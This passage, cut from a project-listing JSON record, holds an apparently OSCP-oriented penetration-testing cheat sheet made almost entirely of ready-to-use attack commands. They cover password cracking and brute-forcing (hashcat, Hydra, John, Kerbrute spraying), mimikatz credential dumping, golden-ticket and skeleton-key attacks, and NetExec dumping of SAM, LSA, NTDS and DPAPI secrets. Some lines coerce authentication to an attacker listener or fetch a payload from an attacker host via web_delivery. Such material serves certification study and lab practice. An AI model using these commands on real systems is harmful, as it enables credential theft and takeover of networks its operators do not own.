\"e99a18c428cb38d5f260853678922e03\" yourPassword|/PATH/TO/WORDLIST/\u003cWORDLIST\u003e ?d?d?d?u?u?u --force --potfile-disable --stdout\n```\n\n##### Generate NetNLTMv2 with internalMonologue and crack with hashcat\n\n```c\nInternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800\n```\n\n###### Result\n\n```c\nspotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000\n```\n\n##### Crack with hashcat\n\n```c\nhashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --force --potfile-disable\n```\n\n##### Rules\n\n\u003e https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule\n\n##### Cracking with OneRuleToRuleThemAll.rule\n\n```c\nhashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule\n```\n\n#### Hydra\n\n```c\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -p \u003cPASSWORD\u003e \u003cPROTOCOL\u003e\nhydra \u003cRHOST\u003e -L /PATH/TO/WORDLIST/\u003cFILE\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e \u003cPROTOCOL\u003e\nhydra \u003cRHOST\u003e -C /PATH/TO/WORDLIST/\u003cFILE\u003e ftp\n```\n\n```c\nexport HYDRA_PROXY=connect://127.0.0.1:8080\nunset HYDRA_PROXY\n```\n\n```c\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/admin.php:username=^USER^\u0026password=^PASS^:login_error\"\nhydra \u003cRHOST\u003e -l \u003cUSERNAME\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/index.php:username=user\u0026password=^PASS^:Login failed. Invalid\"\nhydra \u003cRHOST\u003e -L /PATH/TO/WORDLIST/\u003cFILE\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/login:usernameField=^USER^\u0026passwordField=^PASS^:unsuccessfulMessage\" -s \u003cRPORT\u003e\nhydra \u003cRHOST\u003e -l root@localhost -P otrs-cewl.txt http-form-post \"/otrs/index.pl:Action=Login\u0026RequestedURL=Action=Admin\u0026User=root@localhost\u0026Password=^PASS^:Login failed\" -vV -f\nhydra \u003cRHOST\u003e -l admin -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1\u0026__EVENTVALIDATION=COOKIE_2\u0026UserName=^USER^\u0026Password=^PASS^\u0026LoginButton=Log+in:Login failed\"\n```\n\n#### John\n\n```c\nkeepass2john \u003cFILE\u003e\nssh2john id_rsa \u003e \u003cFILE\u003e\nzip2john \u003cFILE\u003e \u003e \u003cFILE\u003e\njohn \u003cFILE\u003e --wordlist=/PATH/TO/WORDLIST/\u003cWORDLIST\u003e --format=crypt\njohn \u003cFILE\u003e --rules --wordlist=/PATH/TO/WORDLIST/\u003cWORDLIST\njohn --show \u003cFILE\u003e\n```\n\n#### Kerbrute\n\n##### User Enumeration\n\n```c\n./kerbrute userenum -d \u003cDOMAIN\u003e --dc \u003cDOMAIN\u003e /PATH/TO/FILE/\u003cUSERNAMES\u003e\n```\n\n##### Password Spray\n\n```c\n./kerbrute passwordspray -d \u003cDOMAIN\u003e --dc \u003cDOMAIN\u003e /PATH/TO/FILE/\u003cUSERNAMES\u003e \u003cPASSWORD\u003e\n```\n\n#### LaZagne\n\n```c\nlaZagne.exe all\n```\n\n#### mimikatz\n\n##### Common Commands\n\n```c\ntoken::elevate\ntoken::revert\nvault::cred\nvault::list\nlsadump::sam\nlsadump::secrets\nlsadump::cache\nlsadump::dcsync /\u003cUSERNAME\u003e:\u003cDOMAIN\u003e\\krbtgt /domain:\u003cDOMAIN\u003e\n```\n\n##### Dump Hashes\n\n```c\n.\\mimikatz.exe\nsekurlsa::minidump /users/admin/Desktop/lsass.DMP\nsekurlsa::LogonPasswords\nmeterpreter \u003e getprivs\nmeterpreter \u003e creds_all\nmeterpreter \u003e golden_ticket_create\n```\n\n##### Pass the Ticket\n\n```c\n.\\mimikatz.exe\nsekurlsa::tickets /export\nkerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-\u003cRHOST\u003e.LOCAL.kirbi\nklist\ndir \\\\\u003cRHOST\u003e\\admin$\n```\n\n##### Forging Golden Ticket\n\n```c\n.\\mimikatz.exe\nprivilege::debug\nlsadump::lsa /inject /name:krbtgt\nkerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500\nmisc::cmd\nklist\ndir \\\\\u003cRHOST\u003e\\admin$\n```\n\n##### Skeleton Key\n\n```c\nprivilege::debug\nmisc::skeleton\nnet use C:\\\\\u003cRHOST\u003e\\admin$ /user:Administrator mimikatz\ndir \\\\\u003cRHOST\u003e\\c$ /user:\u003cUSERNAME\u003e mimikatz\n```\n\n#### NetExec\n\n```c\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o READ_ONLY=false\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999\nnetexec smb \u003cRHOST\u003e -u '' -p '' --share \u003cSHARE\u003e --get-file \u003cFILE\u003e \u003cFILE\u003e \nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute 100000\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}'\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}'  | awk -F '\\\\' '{print $2}'\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --users\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares \u003cSHARE\u003e --dir\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares \u003cSHARE\u003e --dir \"FOLDER\"\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --lsa\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --dpapi\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --lsa\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --dpapi\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M enum_av\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M wcc\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M snipped\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M lsassy\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M backup_operator\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M web_delivery -o URL=http://\u003cLHOST\u003e/\u003cFILE\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M gpp_autologin\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M gpp_password\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M powershell_history\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M coerce_plus -o LISTENER=\u003cLHOST\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --ntds\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cNTLMHASH\u003e' --ntds\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --ntds --user \u003cUSERNAME\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cNTLMHASH\u003e' --ntds --user \u003cUSERNAME\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cHASH\u003e' -x \"whoami\"\nnetexec smb /PATH/TO/FILE/\u003cFILE\u003e --gen-relay-list \u003cFILE\u003e\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M -user-desc\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M get-desc-users\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M ldap-checker\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M veeam\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M maq\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M adcs\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M zerologon\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M petitpotam\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M nopac\nnetexec ldap \u003cRHOST\u003e -u '' -p '' --use-kcache -M whoami\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --kerberoasting hashes.kerberoasting\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --asreproast hashes.asreproast\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa -k\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa-convert-id \u003cID\u003e\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa-decrypt-lsa \u003cACCOUNT\u003e\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --find-delegation\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M get-network -o ALL=true\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --bloodhound -ns \u003cRHOST\u003e -c All\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --bloodhound --dns-tcp --dns-server \u003cRHOST\u003e -c All\nnetexec winrm \u003cNETWORK\u003e/24 -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -d .\nnetexec winrm -u /t -p '\u003cPASSWORD\u003e' -d '\u003cDOMAIN\u003e' \u003cRHOST\u003e\nnetexec winrm \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nnetexec winrm \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --ignore-pw-decoding\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --no-bruteforce --continue-on-success\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --shares\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --shares --continue\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --pass-pol\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --lusers\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --sam\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --wdigest enable\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e -x 'quser'\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e -x 'net user Admi","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xsyr0%2Foscp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xsyr0%2Foscp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xsyr0%2Foscp/lists"}